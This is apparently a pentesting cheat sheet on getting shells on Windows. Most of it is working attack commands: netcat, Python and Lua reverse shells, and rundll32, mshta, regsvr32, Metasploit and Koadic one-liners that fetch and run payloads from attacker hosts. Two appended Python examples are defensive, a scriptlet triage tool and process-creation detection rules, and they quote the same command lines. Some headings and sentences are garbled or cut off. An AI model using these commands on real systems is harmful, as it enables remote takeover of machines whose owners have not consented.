The page lolbas-project.github.io is for Windows what https://gtfobins.github.io/ is for Linux.
Obviously there are no SUID files or sudo privileges on Windows, but it is useful to know how some binaries can be (ab)used to perform certain unexpected actions, such as executing arbitrary code.
NC
```bash
nc.exe -e cmd.exe <Attacker_IP> <PORT>
```
SBD
sbd is a portable and secure Netcat alternative. It works on Unix-like systems and Win32. With features like strong encryption, program execution, customizable source ports, and continuous reconnection, sbd provides a versatile solution for TCP/IP communication. For Windows users, the sbd.exe version shipped with the Kali Linux distribution can be used as a reliable Netcat replacement.
Python
```bash
#Windows
C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
```
Perl
Perl is a programming language that can be used effectively to build a shell on a Windows system. It offers several ways to do this, for example through modules such as Net::RawIP or Net::Pcap.
Lua
Lua is a scripting language designed for speed and efficiency. Lua can be used as part of the process of compromising a Windows system by executing Lua scripts on the compromised host, and it can help establish interactive access to Windows systems.
```bash
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
```
OpenSSH
Attacker (Kali)
```bash
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commands
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here you will be able to get the response
```
Windows Shell Example
When using a Windows shell in a Windows environment, you can use the following tools to help maintain your access on the target system:
cmd.exe: the basic Windows shell, used for basic commands.
powershell.exe: a more powerful shell, used for PowerShell commands.
wscript.exe: can be used to execute VBScript scripts.
cscript.exe: can be used to execute VBScript scripts from the command line.
wmic.exe: can be used to execute WMI commands.
mshta.exe: can be used to execute HTML Application (HTA) scripts.
rundll32.exe: can be used to execute DLL libraries.
Process performing the network call: powershell.exe
Payload written to disk: NO (at least nowhere I could find using procmon!)
```xml
<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<scriptlet>
<public>
</public>
<script language="JScript">
<![CDATA[
    var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>
```
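The scriptlet above carries its own launch one-liners in XML comments, and its script body does a single thing: instantiate WScript.Shell and call Run. A defender looking at an unknown .sct file wants to answer the same question quickly: does it merely publish COM properties, or does it run code? The Python below is an added example, not code from the original page or from any project it references. It performs a static triage of a scriptlet with regular expressions (rather than a strict XML parser, so the uppercase `<?XML ...?>` declaration in the sample does not get in the way): it extracts the script language and the CDATA bodies, flags the indicators visible in this sample (ActiveXObject instantiation, WScript.Shell, .Run) and notes launcher commands left in comments. The page's own scriptlet is embedded as input; the benign second scriptlet, the indicator names and the verdict labels are constructed for the example.

```python
import re

# The scriptlet quoted on this page, embedded as the sample input. Its only
# action is launching calc.exe, the usual harmless proof-of-execution payload.
SAMPLE_SCT = '''<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<scriptlet>
<public>
</public>
<script language="JScript">
<![CDATA[
    var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>
'''

# Constructed benign scriptlet: publishes one property and runs no shell.
BENIGN_SCT = '''<?xml version="1.0"?>
<scriptlet>
<public>
    <property name="greeting"/>
</public>
<script language="JScript">
<![CDATA[
    var greeting = "hello";
]]>
</script>
</scriptlet>
'''

# Indicator names are constructed for this example; the patterns are the tokens
# that distinguish a code-running scriptlet from one that only publishes properties.
INDICATORS = {
    "activex_instantiation": r"new\s+ActiveXObject\s*\(",
    "wscript_shell": r"WScript\.Shell",
    "shell_run": r"\.Run\s*\(",
    "eval": r"\beval\s*\(",
    "remote_moniker": r"script:https?://",
}
HIGH_RISK = {"activex_instantiation", "shell_run", "eval"}


def inspect_scriptlet(text):
    """Static triage of one COM scriptlet (.sct). Returns a dict of findings.

    Regular expressions are used instead of a strict XML parser so that the
    uppercase <?XML ...?> declaration seen in the sample does not get in the way.
    """
    languages = re.findall(r'<script\s+language\s*=\s*"([^"]+)"', text, re.I)
    bodies = re.findall(r"<!\[CDATA\[(.*?)\]\]>", text, re.S)  # script code lives in CDATA
    code = "\n".join(bodies)
    hits = sorted(name for name, pat in INDICATORS.items() if re.search(pat, code, re.I))
    # Launch one-liners left behind in XML comments are a clue in their own right.
    comments = re.findall(r"<!--(.*?)-->", text, re.S)
    launchers = [c.strip() for c in comments
                 if re.search(r"\b(rundll32|mshta|regsvr32)\b", c, re.I)]
    verdict = "suspicious" if HIGH_RISK & set(hits) else ("review" if hits else "no_indicators")
    return {
        "is_scriptlet": bool(re.search(r"<scriptlet\b", text, re.I)),
        "languages": languages,
        "indicators": hits,
        "launcher_hints": launchers,
        "verdict": verdict,
    }


if __name__ == "__main__":
    for label, sct in (("page sample", SAMPLE_SCT), ("benign sample", BENIGN_SCT)):
        print(label, inspect_scriptlet(sct))
```

The check is deliberately narrow: it looks only inside CDATA bodies for code indicators, so a scriptlet that hides its payload in an attribute or in a second script element would need the patterns extended, and the `remote_moniker` indicator is there to catch a script body that chains to yet another remote scriptlet.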
Rundll32 - Metasploit
```bash
use windows/smb/smb_delivery
run
#You will be given the command to run in the victim: rundll32.exe \\10.2.0.5\Iwvc\test.dll,0
```
Rundll32 - Koadic
```bash
use stager/js/rundll32_js
set SRVHOST 192.168.1.107
set ENDPOINT sales
run
#Koadic will tell you what you need to execute inside the victim, it will be something like:
rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","http://10.2.0.5:9997/ownmG",false);x.send();eval(x.responseText);window.close();
```
Regsvr32 - Metasploit
```bash
use multi/script/web_delivery
set target 3
set payload windows/meterpreter/reverse_tcp
set lhost 10.2.0.5
run
#You will be given the command to run in the victim: regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll
```
You can download and execute a Koadic zombie very easily using the regsvr stager.
In the Shells folder there are a lot of different shells. To download and execute Invoke-PowerShellTcp.ps1, make a copy of the script and append to the end of the file:
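The launcher commands collected on this page, from the NC section onwards (nc -e cmd.exe, rundll32 given a javascript: moniker or a DLL on a UNC share, mshta with an inline vbscript: moniker, regsvr32 /i:http... scrobj.dll), all surface as distinctive process-creation events, which is where a defender catches them whatever C2 (Metasploit, Koadic) sits behind them. The Python below is an added example, not part of the original page nor of the LOLBAS, Metasploit or Koadic projects: a handful of regex rules run over constructed process-creation records (parent image, image path, command line, the shape of a Sysmon event ID 1). Every record is constructed for the example; the hostile command lines are the ones quoted on this page, the tool path C:\Tools\nc.exe is hypothetical, and the rule names are made up here.

```python
import re

# Constructed process-creation records (parent image, image path, command line),
# shaped like the fields of a Sysmon event ID 1. The hostile command lines are the
# ones quoted on this page; the tool path C:\Tools\nc.exe is a hypothetical location.
SAMPLE_EVENTS = [
    ("explorer.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir"),
    ("cmd.exe", r"C:\Tools\nc.exe", "nc.exe -e cmd.exe 10.0.0.5 4444"),
    ("winword.exe", r"C:\Windows\System32\rundll32.exe",
     r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close();'),
    ("cmd.exe", r"C:\Windows\System32\mshta.exe",
     'mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")"))'),
    ("cmd.exe", r"C:\Windows\System32\regsvr32.exe",
     "regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll"),
    ("services.exe", r"C:\Windows\System32\rundll32.exe",
     r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"),
    ("cmd.exe", r"C:\Windows\System32\rundll32.exe", r"rundll32.exe \\10.2.0.5\Iwvc\test.dll,0"),
]

# Each rule: (name, pattern on the image path, pattern on the command line).
# Both patterns must match for the rule to fire. Rule names are constructed.
RULES = [
    # netcat-style tool told to attach a shell to the socket (nc.exe -e cmd.exe ...)
    ("netcat_exec_shell", r"(^|\\)(nc|ncat|sbd)(\.exe)?$", r"\s-e\s+\S*(cmd|powershell)(\.exe)?\b"),
    # rundll32 handed a javascript: moniker instead of a DLL (the mshtml RunHTMLApplication trick)
    ("rundll32_javascript", r"(^|\\)rundll32\.exe$", r"javascript:"),
    # rundll32 loading its DLL straight from a UNC share (the smb_delivery pattern)
    ("rundll32_unc_dll", r"(^|\\)rundll32\.exe$", r"^\s*\S*rundll32(\.exe)?\s+\\\\[^\\\s]+\\"),
    # mshta started with an inline script moniker or a remote script: object
    ("mshta_inline_script", r"(^|\\)mshta\.exe$", r"\b(vbscript|javascript):|script:https?://"),
    # regsvr32 fetching a scriptlet over HTTP through scrobj.dll
    ("regsvr32_remote_sct", r"(^|\\)regsvr32\.exe$", r"/i:https?://.*scrobj\.dll"),
]


def match_rules(image, cmdline):
    """Names of every rule whose image and command-line patterns both match one event."""
    return [name for name, image_re, cmd_re in RULES
            if re.search(image_re, image, re.I) and re.search(cmd_re, cmdline, re.I)]


def scan_events(events):
    """Return (parent, image, cmdline, rule_names) for each event that fired at least one rule."""
    findings = []
    for parent, image, cmdline in events:
        hits = match_rules(image, cmdline)
        if hits:
            findings.append((parent, image, cmdline, hits))
    return findings


if __name__ == "__main__":
    for parent, image, cmdline, hits in scan_events(SAMPLE_EVENTS):
        print(f"[{', '.join(hits)}] parent={parent} image={image}\n    {cmdline}")
```

Two design points: the image patterns key on the resolved executable path rather than on the first command-line token, so a renamed copy of nc.exe will evade the netcat rule (pair it with network telemetry for the outbound connection), and ordinary `rundll32.exe <dll>,<entrypoint>` invocations are deliberately left alone, since the signal is the javascript: moniker or the UNC path, not rundll32 itself.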